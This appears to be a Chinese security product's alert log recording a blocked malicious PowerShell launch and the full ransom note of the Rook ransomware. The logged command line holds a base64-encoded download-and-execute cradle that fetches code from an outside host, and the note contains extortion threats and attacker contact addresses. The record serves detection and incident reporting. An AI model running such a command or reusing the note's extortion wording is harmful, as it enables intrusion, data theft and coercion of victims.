|
|
防护项目:利用PowerShell执行可疑脚本
执行文件:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
执行命令行:"powershell.exe" -NoP -NonI -ep bypass -e SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwB5AGUALgB5AGUAYQByAGkAZABwAGUAcgAuAGMAbwBtACcAKQApAA==
操作结果:已阻止
进程ID:6420
操作进程:C:\Windows\nssm.exe
操作进程命令行:C:\Windows\nssm.exe
父进程ID:916
父进程:C:\Windows\system32\services.exe
父进程命令行:C:\Windows\system32\services.exe
病毒内容
-----------Welcome. Again. --------------------
[+]Whats Happen?[+]
Your files are encrypted,and currently unavailable. You can check it: all files on you computer has expansion Rook.
By the way,everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER).
[+] What guarantees?[+]
Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests.
To check the file capacity, please send 1 files not larger than 1M to us, and we will prove that we are capable of restoring.
If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data,cause just we have the private key. In practise - time is much more valuable than money.
If we find that a security vendor or law enforcement agency pretends to be you to negotiate with us, we will directly destroy the private key and no longer provide you with decryption services.
You have 3 days to contact us for negotiation. Within 3 days, we will provide a 50% discount. If the discount service is not provided for more than 3 days, the files will be leaked to our onion network. Every more than 3 days will increase the number of leaked files.
We will replace the private key every 15 days and the old private key will be deleted. Please do not contact us if it has been encrypted for more than 15 days, we can do nothing, even if God comes, there is nothing we can do.
Our mail box:
securityrook@privatemail.com
If there is no reply for a long time, please contact the following email address!
securityrook@horsefucker.org
------------------------------------------------------------------------------------------------
!!!DANGER!!!
DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data.
!!!!!!!
YOUR PERSONAL ID: Ihu9KycnttLue7GJTyt+nfQ26D84J0XKw4V47RXbV6/6nJJ7J//+q8My33k0uAhs3U/IogRbx9+sjsO+y2eyajFnV/fL3TZVsh4dUwFB/Ku5CiOoiOPefD8MgmYGXlZqWrOT4Wq10kzIoePSZDj3zpbEawk07rv/u0/yXbH4ckPj77FPnPvYt+MGIOsQ7AgsAkSYL6JI2vSd9G/u0LnOJS/Qjvoe8SNk1VY0Y7PzEbSbsV8CUCFlYbbcC8RDn+cmcL9rFu3S2BkMoEF3mZZQVxKse5i+VptXHCUjvXZlj8mNwOStbg7rYXYX5o8brnfQVrrtF5afxNBlddmJpayruq+jgLINAw5dB45bzRenr/S9Mo5FCTeTQJWNylOerp4G69dm+NF2eYFe1DW/zktIwz7MK4qDh/kvHDHfyAZ/kRGL4Zu3iprYxdleZ8yMdO8FXSjTu4K6/hWY9JyFSiayNYmHN/Pg9FHN0R/2NsKtQ/oO+PJkQHO6P8a3ZxzbC2oxpEkXLJ1FV/ldB1pQM/iMHNF3/awBYhlJlpzMhFrFWWax2XhKIvzBfZYsDEmVFcKKCsl09gAub4tgAJVfaNdeG87UWUtyCUX9BuMgrPkrFnb3EzlHDX92dNDbfSSk9KSCwjs7dtvtSlPJroTJGVCDIb6A/7Y5y9G8jr8orpfceE4=
|
|
收藏
